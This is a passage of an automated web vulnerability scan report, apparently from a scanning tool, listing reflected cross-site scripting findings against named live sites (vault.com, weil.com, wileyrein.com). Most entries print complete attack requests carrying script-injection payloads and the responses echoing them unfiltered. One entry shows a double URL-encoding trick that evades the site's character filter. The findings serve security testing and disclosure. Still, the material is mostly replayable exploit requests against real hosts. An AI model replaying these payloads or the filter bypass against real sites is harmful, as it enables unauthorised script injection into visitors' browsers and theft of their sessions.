Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aad31'-alert(1)-'06716bb157a was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:02 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000WFjo2zwl_9oEr80PpKWu5gg:140i3s34m; Path=/
Keep-Alive: timeout=10, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:07 GMT;path=/
Content-Length: 68247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
TML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,
...[SNIP]...

4.132. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa29d"><script>alert(1)</script>5276a27416 was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:14 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; Path=/
Keep-Alive: timeout=10, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:19 GMT;path=/
Content-Length: 105551


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://w
...[SNIP]...

4.133. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3ee'-alert(1)-'98bd799206f was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:19 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000MQBSbTmGmG6cUM5JRSrgH2H:140i3s34m; Path=/
Keep-Alive: timeout=10, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:23 GMT;path=/
Content-Length: 105369


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
WhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,
...[SNIP]...

4.134. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankings request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dd0"><script>alert(1)</script>38ea02e91b3 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:32 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000ZhDNSaflUJHG19KHTNmMcEc:140i3s34m; Path=/
Keep-Alive: timeout=10, max=70
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:37 GMT;path=/
Content-Length: 112861


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.co
...[SNIP]...

4.135. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankings request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5bc'-alert(1)-'f398cddff33 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:36 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=00006eAw26jeIW_D_4cRI9jb5gh:140i3s34m; Path=/
Keep-Alive: timeout=10, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:40 GMT;path=/
Content-Length: 112654


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,go
...[SNIP]...

4.136. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the regionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86be1"><script>alert(1)</script>fd63fd4328b was submitted in the regionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:48 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000X9qEA0qCib-qziLPO4C_5_v:140i3s34m; Path=/
Keep-Alive: timeout=10, max=73
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:53 GMT;path=/
Content-Length: 112905


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/us
...[SNIP]...

4.137. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the regionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b6'-alert(1)-'bf48ddfbfb1 was submitted in the regionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=00003TfEqWCiulBu_nDIESAN2zl:140i3s34m; Path=/
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:56 GMT;path=/
Content-Length: 112742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
ID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...

4.138. http://www.weil.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h3zixcnxcv5l1a45xxonrz45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19529
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<!--
window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O
...[SNIP]...

4.139. http://www.weil.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2rtk5eyh144bhwn4mxrat4ro; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19431
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]>
...[SNIP]...

4.140. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="85981"><script>alert(1)</script>038dfd0999c" value="1">
...[SNIP]...

4.141. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css490d8"><script>alert(1)</script>a3a95841ba2/_blog.css" value="">
...[SNIP]...

4.142. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
